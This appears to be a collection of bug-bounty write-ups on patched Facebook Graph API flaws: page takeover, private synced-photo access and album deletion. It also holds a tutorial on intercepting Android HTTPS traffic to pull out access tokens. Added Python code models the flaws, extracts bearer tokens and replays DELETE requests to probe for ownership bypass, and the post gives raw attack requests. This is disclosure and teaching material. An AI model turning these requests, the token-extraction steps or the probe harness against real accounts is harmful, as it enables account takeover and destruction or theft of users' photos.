A security vulnerability in the Facebook Business Manager endpoint allowed a third-party application with limited permissions to take over a Facebook page, after which the victim permanently lost admin access to the page.
By default, the Facebook application interface does not allow third-party applications to add or modify page admin roles (page roles such as manager, editor, analyst, etc.). Third-party applications are allowed to perform operations such as posting statuses on your behalf, publishing photos, etc., but not adding admin roles, because an application that could add or remove admins could add some user as an admin of the page and remove the actual owner permanently.
On the other hand, there is an endpoint for business pages called userpermissions that allows adding or removing page admin roles for users who already belong to the Facebook business.
The following request would make the target user an admin of the page.
After a few minutes of testing, I found that removing the business parameter from the request didn't throw any error and allowed us to add anyone as a new page admin and delete the actual page admin on a non-business page where the application has the manage_pages permission.
That's it! Whatever the application may be, if it has the manage_pages permission granted by the admin, it could take over every page of your Facebook account in a fraction of a second.
Reported this vulnerability to the Facebook security team and it is completely fixed now. They rewarded me $2,500 USD as a part of their bug bounty program. Even though they have placed a fix for this vulnerability, please be aware of the permissions you grant to any application.
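To make the flaw concrete, here is a small Python model of the userpermissions handler as the post describes it: the business membership check only runs when the optional business parameter is present, so dropping the parameter skips it. This is an added illustration, not Facebook's code; the handler, the data structures, the business membership table, the allowlist of first-party apps and the error codes are all assumptions.

```python
"""Model of the userpermissions bug: a check that only runs when an optional
parameter is supplied. Added illustration with assumed names; not Facebook's code."""

from dataclasses import dataclass, field


@dataclass
class Page:
    page_id: str
    admins: set = field(default_factory=set)


@dataclass
class AccessToken:
    user_id: str   # token owner
    app_id: str    # application the token was issued to
    scopes: set    # granted permissions, e.g. {"manage_pages"}


# Assumed fixture: which users belong to which business account.
BUSINESS_MEMBERS = {"biz_1": {"owner", "colleague"}}
# Assumed: only first-party apps may change page roles at all.
FIRST_PARTY_APPS = {"facebook_business_manager"}


def _error(code, message):
    return {"error": {"message": message, "type": "OAuthException", "code": code}}


def _apply_role_change(page, params):
    if params["action"] == "add":
        page.admins.add(params["user"])
    elif params["action"] == "remove":
        page.admins.discard(params["user"])
    return {"success": True}


def userpermissions_vulnerable(page, token, params):
    """Vulnerable: the business membership check is skipped when 'business' is absent."""
    if token.user_id not in page.admins or "manage_pages" not in token.scopes:
        return _error(200, "(#200) Permissions error")
    if "business" in params:
        members = BUSINESS_MEMBERS.get(params["business"], set())
        if params["user"] not in members:
            return _error(100, "(#100) User is not a member of the business")
    # Without 'business' the request falls straight through to the role change,
    # so any third-party app holding manage_pages can add or remove admins.
    return _apply_role_change(page, params)


def userpermissions_fixed(page, token, params):
    """Hardened: third-party apps are refused outright, and the business
    context is a required parameter rather than an optional one."""
    if token.app_id not in FIRST_PARTY_APPS:
        return _error(200, "(#200) Application does not have the capability to make this API call.")
    if token.user_id not in page.admins or "manage_pages" not in token.scopes:
        return _error(200, "(#200) Permissions error")
    business = params.get("business")
    if business is None:
        return _error(100, "(#100) Missing required parameter: business")
    if params["user"] not in BUSINESS_MEMBERS.get(business, set()):
        return _error(100, "(#100) User is not a member of the business")
    return _apply_role_change(page, params)


if __name__ == "__main__":
    page = Page("page_1", {"owner"})
    third_party = AccessToken("owner", "some_third_party_app", {"manage_pages"})
    # Attacker's app adds itself and removes the real owner without a business parameter.
    print(userpermissions_vulnerable(page, third_party, {"user": "attacker", "action": "add"}))
    print(userpermissions_vulnerable(page, third_party, {"user": "owner", "action": "remove"}))
    print("admins after attack:", page.admins)
    print(userpermissions_fixed(Page("page_2", {"owner"}), third_party,
                                {"user": "attacker", "action": "add"}))
```

The general lesson is that an authorization check must not be keyed on the presence of a client-controlled parameter: the hardened version decides on the calling app and the token's scopes first, and treats the missing parameter as an error rather than as "no business, no check".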
The permissions dialog box looks like this:
If manage_pages is requested, note that the app will be able to manage your pages (post statuses, publish photos, etc.).
You need not worry: you can still modify the permissions you have granted to other apps here.
One of the most important things in Android application penetration testing is capturing an Android application's HTTPS traffic.
Reading the HTTP traffic generated by Android apps is somewhat easier than reading HTTPS traffic, because HTTPS is encrypted in transit; to read it we have to put a proxy with its own certificate between the app and the server.
Recently some people asked me how to get the Facebook for Android access token. It can be done by intercepting the SSL/HTTPS traffic of the Facebook application.
So here is the easy way to intercept, read and modify the SSL network traffic generated by Android applications.
Things we need :
1) An Android mobile phone.
2) A WiFi Internet connection.
3) A laptop or desktop with Charles proxy installed.
Note : The desktop/laptop should be connected to the same network as your mobile, i.e. the same WiFi connection.
Step 1 : Install Charles proxy on your computer
Charles proxy is available for Windows, Mac and Linux. Read their documentation for any help related to installation. By default, Charles proxy listens on port 8888.
Step 2 : Set up the WiFi proxy on your Android mobile
On your Android mobile, go to Settings > Wi-Fi and long-press the active network connection. Select "Modify network" > tick "Advanced options", and change the proxy drop-down menu from None to Manual.
Enter your computer's local IP address (e.g. 192.168.1.100) as the host and 8888 as the port.
Also note down the local IP address of your mobile, shown at the top of the Modify network menu. Note that some older versions of Android do not support the WiFi proxy feature.
Step 3 : Install the SSL certificate in Android's trusted credentials
Before installing the SSL certificate, we need to add our Android mobile's local network IP to the Charles proxy access control list: Proxy > Access Control Settings in Charles proxy.
Add the local IP we noted in step 2 to the access control list.
Extract the Charles root certificate and copy it to your mobile's SD storage.
On your mobile, go to Settings > Security > Install (certificates) from memory / SD card and select the certificate file.
Step 4 : Intercept SSL / HTTPS traffic
We can now intercept all HTTP traffic. For HTTPS, we need to enable SSL proxying in Charles proxy: Proxy > Proxy Settings > SSL and select "Enable SSL proxying". Add Hostname : * and Port : * there.
This will cover all domains and ports. You can narrow the wildcards as per your need.
That's all; we are done.
Charles proxy shows all the requests made from the Android device. Make use of breakpoints in Charles proxy to modify requests and responses.
Now we can read and modify all the traffic (both HTTP and HTTPS) generated by Android applications that obey the Android proxy settings.
Some apps ignore the Android proxy settings; in that case we need a rooted Android device. The same goes for apps that pin their server certificate and, since Android 7.0, for apps targeting API level 24 or higher, which no longer trust user-installed CA certificates by default: they will reject the Charles certificate, and a rooted device (or a modified app) is required. Remember to remove the Charles certificate from the trusted credentials once you are done, since while it is installed anyone holding the Charles private key can intercept the phone's traffic.
For those who want the Facebook for Android access token: open the Facebook app on your mobile and you will see the access token in the Authorization header of every request sent to graph.facebook.com or api.facebook.com in Charles proxy.
I hope this post is useful. Please let me know if you have any doubts.
Also read how to find the Facebook ID of your page, group or profile using our online tool!
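Once the session is captured, picking the token out by hand from hundreds of requests is tedious. The Python script below, an added example rather than part of the original post, does it from a Charles session saved as a HAR file (File > Export Session in Charles). It assumes the app sends the token as an "Authorization: OAuth <token>" header, as described above; the embedded HAR fragment is constructed for the demonstration and the token values are placeholders.

```python
"""Extract Facebook access tokens from a Charles session exported as HAR.
Added example, not from the original post; sample data is constructed."""

import json
from urllib.parse import urlsplit

FB_HOSTS = frozenset({"graph.facebook.com", "api.facebook.com"})

# Constructed HAR fragment standing in for a real export; tokens are placeholders.
SAMPLE_HAR = json.dumps({"log": {"entries": [
    {"request": {"method": "GET", "url": "https://graph.facebook.com/me?fields=id",
                 "headers": [{"name": "Host", "value": "graph.facebook.com"},
                             {"name": "Authorization", "value": "OAuth EAAB_placeholder_token"}]}},
    {"request": {"method": "POST", "url": "https://api.facebook.com/method/example",
                 "headers": [{"name": "Authorization", "value": "OAuth EAAB_placeholder_token"}]}},
    {"request": {"method": "GET", "url": "https://example.com/",
                 "headers": [{"name": "Authorization", "value": "Bearer unrelated_token"}]}},
]}})


def extract_tokens(har_text, hosts=FB_HOSTS):
    """Return {host: sorted distinct tokens} for Authorization headers sent to `hosts`.

    Only the host part of the request URL is compared, so a token sent to an
    unrelated domain (a tracker, a CDN) is never mixed in with the Facebook ones."""
    har = json.loads(har_text)
    found = {}
    for entry in har.get("log", {}).get("entries", []):
        request = entry.get("request", {})
        host = urlsplit(request.get("url", "")).hostname
        if host not in hosts:
            continue
        for header in request.get("headers", []):
            if header.get("name", "").lower() != "authorization":
                continue
            # Header value is "<scheme> <token>"; keep the token only.
            _scheme, _, token = header.get("value", "").partition(" ")
            if token:
                found.setdefault(host, set()).add(token)
    return {host: sorted(tokens) for host, tokens in found.items()}


def redact(token, keep=4):
    """Mask all but the last `keep` characters, for writing findings into a report."""
    return "*" * max(0, len(token) - keep) + token[-keep:]


if __name__ == "__main__":
    for host, tokens in extract_tokens(SAMPLE_HAR).items():
        for token in tokens:
            print(host, redact(token))
```

To run it on a real capture, replace SAMPLE_HAR with the contents of the exported .har file. Treat the extracted token like a password: it is a bearer credential for the account, so keep it out of tickets and screenshots (hence the redact helper).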
What if your private mobile photos got exposed publicly?
All of us have the habit of taking photos with our mobile, and among them there would definitely be some private photos. What if they get hacked?
This post is about a security vulnerability I found on Facebook which allowed any malicious Facebook application to read your synced mobile photos.
The Facebook mobile application has a feature called "Sync photos" which helps us keep a backup (up to 2 GB) of our mobile photos. This feature makes the Facebook mobile application upload all the photos taken by your mobile to your account, where they remain private until you publish them.
The Sync photos feature is turned on by default on some mobile phones. It can be controlled in the app settings. Most of us are unaware of this feature; if you don't want Facebook to back up your photos, go to the app settings and turn it off.
I was really curious to know which endpoint handles these photos. After a bit of research, I found that the "vaultimages" endpoint of the Facebook Graph API handles the synced photos. I started exploring the endpoint. Reading the synced photos through this endpoint caught my eye, and it seemed vulnerable.
After a few minutes of testing, I realized that the "vaultimages" endpoint is vulnerable. Bingo! 😀
The Facebook mobile application makes a GET request to https://graph.facebook.com/me/vaultimages with a top-level access token to read the synced photos. The Facebook server checks the request for a proper access token and serves the synced photos of the respective user in the response.
The vulnerable part is that the server only checked the owner of the access token, not the application making the request. So it allowed any application with the user_photos permission to read your synced mobile photos, a classic confused-deputy situation: the token says whose data may be read, but nothing ties the privileged endpoint to the first-party app it was built for.
A large number of Facebook applications use the user_photos permission to read users' public photos.
A malicious app that you are using could steal all of your private photos in a few seconds. I know that most of us don't read the list of permissions when using an application.
Please review the permissions before granting them.
Proof of Concept Video:-
Reported this vulnerability to the Facebook Security Team; as usual, they were very fast in addressing this issue. They pushed a fix in less than 30 minutes after acknowledging the report. They are simply awesome in this regard!
They whitelisted their official mobile applications on that endpoint, so no other application can access your private photos anymore. This vulnerability is completely patched: vault images cannot be accessed by any application except the whitelisted ones. Any other application now receives this error:
{
  "error": {
    "message": "(#3) App must be on whitelist",
    "type": "OAuthException",
    "code": 3
  }
}
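The following Python model shows the difference between the check that was in place and the one the fix adds: the first version decides on the token's owner and scope alone, the second also binds the endpoint to the calling application and returns the whitelist error shown above. This is an added illustration and not Facebook's code; the token fields, the allowlist of app names, the photo IDs and the error code for a missing permission are assumptions.

```python
"""Model of the vaultimages authorization flaw and its fix.
Added illustration with assumed names; not Facebook's code."""

from dataclasses import dataclass


@dataclass(frozen=True)
class AccessToken:
    user_id: str        # whose data the token can reach
    app_id: str         # which application holds the token
    scopes: frozenset   # granted permissions, e.g. {"user_photos"}


# Assumed fixture: each user's synced (private) mobile photos.
VAULT = {"user_1": ["vault_photo_1", "vault_photo_2"]}
# Assumed allowlist of first-party mobile apps.
WHITELISTED_APPS = frozenset({"facebook_for_android", "facebook_for_ios"})


def _oauth_error(code, message):
    return {"error": {"message": message, "type": "OAuthException", "code": code}}


def vaultimages_vulnerable(token):
    """Before the fix: only the token owner and the user_photos scope are checked,
    so any third-party app the user authorized can read the private vault."""
    if "user_photos" not in token.scopes:
        return _oauth_error(10, "(#10) Missing permission: user_photos")  # assumed code
    return {"data": list(VAULT.get(token.user_id, []))}


def vaultimages_fixed(token):
    """After the fix: the calling application must be on the whitelist; the
    user-level checks are unchanged and run afterwards."""
    if token.app_id not in WHITELISTED_APPS:
        return _oauth_error(3, "(#3) App must be on whitelist")
    if "user_photos" not in token.scopes:
        return _oauth_error(10, "(#10) Missing permission: user_photos")  # assumed code
    return {"data": list(VAULT.get(token.user_id, []))}


if __name__ == "__main__":
    # Same user, same scope, different app: that is the whole difference.
    official = AccessToken("user_1", "facebook_for_android", frozenset({"user_photos"}))
    third_party = AccessToken("user_1", "some_photo_app", frozenset({"user_photos"}))
    print("vulnerable, third-party app:", vaultimages_vulnerable(third_party))
    print("fixed, third-party app:     ", vaultimages_fixed(third_party))
    print("fixed, official app:        ", vaultimages_fixed(official))
```

The check on the app has to come first: an endpoint that was only ever meant for first-party clients should refuse everyone else before it even looks at what the user granted.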
First Acknowledgement from Facebook Security Team.
Acknowledgement of Fix.
They rewarded me $10,000 USD as a part of their bug bounty program.
I got my name listed in their white-hat honour list for reporting vulnerabilities.
A couple of vulnerabilities (this one and the photo-deleting vulnerability) took me to the top of the list 😀 I thank the Facebook Security Team for quickly patching this issue and also for running the bug bounty program.
Feel free to share your thoughts below in the comments 🙂
What if your photos get deleted without your knowledge?
Obviously, that's very upsetting, isn't it? Yes. This post is about a vulnerability I found which allowed a malicious user to delete any photo album on Facebook. Any photo album owned by a user, a page or a group could be deleted.
The Graph API is the primary way for developers to read and write user data. All Facebook apps now use the Graph API. In general, the Graph API requires an access token to read or write user data. Read more about the Graph API here.
According to the Facebook developer documentation, photo albums cannot be deleted using the album node in the Graph API.
I tried to delete one of my photo albums using a Graph API Explorer access token.
Request :-
DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245
access_token=CAACEd…..MUZD
Response :-
{"error":{"message":"(#200) Application does not have the capability to make this API call.","type":"OAuthException","code":200}}
Why? Because this application doesn't have the capability to delete a photo album. But note the error message: it tells us that some other application does have the capability to make this API call 😛
I decided to try it with a Facebook for Android access token, because it is a top-level access token with some extra permissions. Facebook's mobile apps use the same Graph API, so I took one of my album IDs and my Facebook for Android access token and tried it.
Request :-
DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245
access_token=<Facebook_for_Android_Access_Token>
Response:-
true
Album (518171421550249) got deleted 😀 So what's the next step? I took the victim's album ID and tried to delete it. I was very curious to see the result.
Request :-
DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245
access_token=<Facebook_for_Android_Access_Token>
Response:-
true
OMG 😀 the album got deleted! So what? I could delete all of your Facebook photos (photos which are public or which I could see) 😛 lol 😀
I immediately reported this bug to the Facebook security team. They were very fast in identifying the issue, and a fix was in place less than 2 hours after the acknowledgment of the report.
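The three exchanges above follow one pattern: the same DELETE request, replayed with a different token and then against an object the tester does not own, with the reply telling you which check is missing. The Python harness below, an added example and not the author's tooling, automates that pattern: it builds the raw request shown in the post (with a correct Content-Length), classifies the Graph API reply ("true" versus an error object), and runs every token/object combination to flag a delete that succeeded on someone else's object. Sending is injected as a function, so here it runs offline against a constructed stand-in that reproduces the behaviour the post reports; the token values and album IDs are placeholders.

```python
"""Replay harness for the album-deletion test. Added example, not the author's
tooling; the stand-in server and all tokens/IDs are constructed placeholders."""

import json

GRAPH_HOST = "graph.facebook.com"


def build_delete_request(object_id, access_token):
    """Raw HTTP/1.1 DELETE with the token in the body and a correct Content-Length."""
    body = "access_token=" + access_token
    head = ("DELETE /%s HTTP/1.1\r\n"
            "Host: %s\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            "Content-Length: %d\r\n\r\n" % (object_id, GRAPH_HOST, len(body)))
    return (head + body).encode("ascii")


def classify_graph_response(body_text):
    """'true' -> ('deleted', None); Graph error JSON -> ('error', code); else ('unexpected', None)."""
    text = body_text.strip()
    if text == "true":
        return ("deleted", None)
    try:
        obj = json.loads(text)
    except ValueError:
        return ("unexpected", None)
    if isinstance(obj, dict) and isinstance(obj.get("error"), dict):
        return ("error", obj["error"].get("code"))
    return ("unexpected", None)


def probe_matrix(send, object_ids, tokens):
    """Send each (token, object) combination; send(raw_bytes) must return the reply body."""
    results = {}
    for obj_label, obj_id in object_ids.items():
        for tok_label, tok in tokens.items():
            raw = build_delete_request(obj_id, tok)
            results[(tok_label, obj_label)] = classify_graph_response(send(raw))
    return results


def find_ownership_bypass(results, own_label="own"):
    """(token, object) pairs where a delete succeeded on an object the tester does not own."""
    return sorted(pair for pair, outcome in results.items()
                  if pair[1] != own_label and outcome == ("deleted", None))


def fake_graph_server(raw):
    """Constructed stand-in reproducing the behaviour the post reports; not Facebook's server.
    Graph Explorer tokens (assumed to start with 'CAACEd', as in the post) are refused;
    any other token deletes any album, i.e. no ownership check at all."""
    _head, _, body = raw.decode("ascii").partition("\r\n\r\n")
    token = body.partition("=")[2]
    if token.startswith("CAACEd"):
        return json.dumps({"error": {
            "message": "(#200) Application does not have the capability to make this API call.",
            "type": "OAuthException", "code": 200}})
    return "true"


if __name__ == "__main__":
    matrix = probe_matrix(fake_graph_server,
                          {"own": "518171421550249", "victim": "victim_album_id_placeholder"},
                          {"explorer": "CAACEd_placeholder", "android": "ANDROID_placeholder"})
    for pair, outcome in sorted(matrix.items()):
        print(pair, outcome)
    print("ownership bypass:", find_ownership_bypass(matrix))
```

Against a live target you would replace fake_graph_server with a function that opens a TLS connection to graph.facebook.com and returns the response body, and only ever use object IDs you own or have permission to test against. The ("android", "victim") entry is the finding: a privileged token should still be refused when the object belongs to someone else.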